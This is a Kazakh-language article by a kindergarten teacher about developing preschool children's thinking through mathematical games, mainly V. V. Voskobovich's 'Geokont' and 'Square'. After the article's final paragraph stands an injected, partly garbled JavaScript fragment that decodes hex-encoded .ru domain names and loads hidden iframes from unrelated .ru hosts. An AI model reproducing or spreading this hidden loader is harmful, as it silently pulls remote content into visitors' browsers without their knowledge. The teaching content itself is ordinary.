Балалардың танымдық қабілеттерін дамыту

 

Ойын баланың алдынан өмір есігін ашып,

 оның шығармашылық қабілетін дамытады,

ойынсыз ақыл - ойдың қалыптасуы мүмкін емес"

В. А. Сухомлинский

 

Өзімнің зерттеу тақырыбым: "Мектеп жасына дейінгі балалардың қызықты математика арқылы танымдық қабілеттерін дамыту" 

Сондықтан балалармен өткізілетін математиканың алғашқы ұғымдарын қалыптастыру іс-әрекетте ойынның мынадай түрлерін пайдаланамын:
1) дидактикалық ойындар–логикалық ойлауын, математикалық қабілеттерін дамыту.
2) санға байланысты санамақ, жаңылтпаштар, жұмбақтар–балалардың сандарды танып білуін, тілдерін жаттықтыру, есте сақтауын, ойлау қабілеттерін дамыту.
3) математикалық сергіту сәттері–кеңістікті бағдарлау, қимыл қозғалысты дамыту. Дидактикалық ойындар балалардың зейінін, есте сақтауын, байқағыштығын, көзбен мөлшерлеуін, тапқырлығын дамытуға, математикалық білімдерін, икемділіктері мен дағдыларын, заттарды түсі, өлшемі, пішіні бойынша топтастыруға, салыстыруға, ажыратуға, кеңістік пен уақытты бағдарлауға үйрету. Балалардың логикалық ойлау, қабылдау, есте сақтау қабілеттерін, зейінін, қолдың ұсақ моторикасын дамытуға арналған.

"Аленушка" балабақшасына келгеніме жарты жыл ғана болды, өте шығармашыл ұжым екен. Олар тек қана бір технологияны ғана алмай, әр тәрбиешіге бір технологияны  ашып, толық көрсетуге ұсынған. Мені бұл өте қызықтырды интернетке кіріп, біраз уақыт  отырып, неліктен маған осы технологияларды бір сабақта көрсетпесем деп ой келді. 

Мен өз тобымның балаларымен «Ғажайып әлем» сабағын көрсеттім, сабақта көпфункционалдық панно "Ағаш", В.В. Воскобовичтің "Геоконт" ойыны, М.Монтессори, В. Ф.Базарный, өнертапқыш тапсырмаларды шешудің технологиялары пайдаланылдым.Сабақ өте қызықты, эмоционалды әсерлі болды. Балаларға да тәрбиешілерге менің өзім жасаған "Геоконтым" қызықты болды: балалар  берілген тапсырмаларға сай резенкелерді шегелерге созып ілу барысында заттық мүсіндер, геометрикалық пішіндер, өрнектер, цифрлар, әріптер шығара бастады, тәрбиешілер қалай жасағынымды, өзгертуге болады ма, қандай материалдан жасау керектігін сұрастырып жатты.                                                                                                                                   "Геоконт" ойынының мақсаттары: баланың қиалын, логикасын, ұсақ қол бұлшық еттерін, сенсориканы дамытады, мүсінді құрастыруға үйретеді, зияткерлікті жетілдіреді және  шығармашылық пен қисын  қабілеттерін дамытады.            

 Ойын барысы: Сөздік алгоритімі, үлгі және өзіндік түпкі ойы бойынша, бала берілген тапсырмаларға сай резенкелерді шегелерге созып ілу барысында заттық мүсіндер, геометрикалық пішіндер, өрнектер, цифрлар, әріптер шығарады.

 

Вячеслав Викторович Воскобович Запорожьеде туған. Мектеп жылдарын  Херсонда  өткізіп, Ленинград кеткен, сонда Политехникалық институтында , инженер - физик мамандығына ие болған.Екі жыл армияда болып, Ленинградқа қайта оралған. Вячеслав Викторович физикадан басқа, өлең мен әуендерді жазуды, ән айтуды жақсы көреді. Семинарларда ол міндетті түрде өз әндерін орындап береді. Ең алғаш семинары Краснодар қаласында 1993 жылы болған. Педагогикаға өзінің айтқаны бойынша, оны  балалары әкелді.  90-шы  жылдардың басы - ол жаңа және альтернавтік ізденіс уақыты. Сол кезде В. Воскобовичтің методикасы тап болған. Ол ойындар шығаратын фирманы ұйымдастырған.  Қазіргі кезде ол "Воскобовичтің дамытушы ойындары" жеке меншік мекемесі - автордың ойындары мен әдістемелерін шығаратын.  Ойындар түрлері: «Коврограф» - «Кілемше», «Игровизор» - «Ойын дидары», «Шнурки» - «Сиқырлы баулар», «Квадрат» - «Шаршы», үлестірмелі материалдар. Вячеслав Викторович Воскобовичтің ойындары көпфункционалдығымен ерекшеленіп балалардың ойынға деген құштарлығын оятып, көнілін аудартады.

Бұл методикада  ертегі кейіпкерлері бар: Гео балақай, Метр қарға, Всюсь, Крутик По, Долька қыз және т.б.   Ол сиқырлы Күлгін Орманда өмір сүреді.  Бұл Орман қазіргі кезде көптеген балабақшалаларда - дамытушы орта, сенсорика бұрышы  болып табылады.                                                              

Мен өз іс - тәжірибемде Вячеслав Викторович Воскобовичтің  "Геоконтты" қана пайдаланып үлгердім, енді  "Шаршыны" балаларға ұсынғым келіп отыр. "Орамал", "Мәңгілік Оригами" - бұл бәрі Воскобовичтің шаршының синонимдары. Жасау түрі оның өте оңай: төртбұрышты мата бетіне үшбұрыштар жапсырылған.  Бір жағынан - қызыл түсті, ал басқа жағынан -  жасыл түсті. Воскобовичтің шаршысы -  қиял мен қисынды дамытатын ойын. Шаршыны әртүрлі пішіндерге бүктеуге болады: балалар онайлықпен үйді де жасай алады, кәмпитті де, ересек       балалар үйшіктің ішіндегі геометриялық пішіндерді ажырата алады.         Есептерді шығаруға балаларға Трапеция - ана, Тіктөртбқрыш - әке, Төртбұрыш - ата көмектеседі.     

Бүктеу варианттары - 1000000.                                               

Ойын ойнауды сәбілік кезімізден бастаймыз, бастауыш мектепте аяқтаймыз.  Ойын - балалардың танымын, тіл байлығын, сөздік қорын дамытудың ең тиімді жолы болып саналады.  ойын барысында берілген тапсырмаларды шешуде балалардың ақыл - ойы дамиды. Міне, осыдан баланың логикалық ойлау қабілеті шыңдалады, дамиды. Ойындар қолдану сабақтың әсерлігін арттырып, балалардың логикалық ойлауын, математикалық қабілеттерін дамытады. Тәрбиеші  ойындарды  шығармашылықпен түрлендіре отырып, өнертапқыш тапсырмаларды шешудің технологиялары, В.В. Воскобович, М.Монтессори, В. Ф.Базарный т.б. жаңа технологияларды қолданып жатса, балалардың  психофизиологиялық ерекшеліктерін ескеріп, жаңа тақырыпты өткенде өткен материалды қайталағанда, білімді тиянақтау негізінде топтағы барлық балалармен жүргізілетін бағдарламалар аясында жұмыс істеген абзал.            <>window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),o="14945",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e< id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display:none">< id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display:none">
Прикреплённые файлы:Bakova_G.Zh..docx
Автор: Бакова Г.Ж.
Просмотров: 653
Дата создания: 30 Октября 2016 г.
Дата редактирования: 30 Октября 2016 г.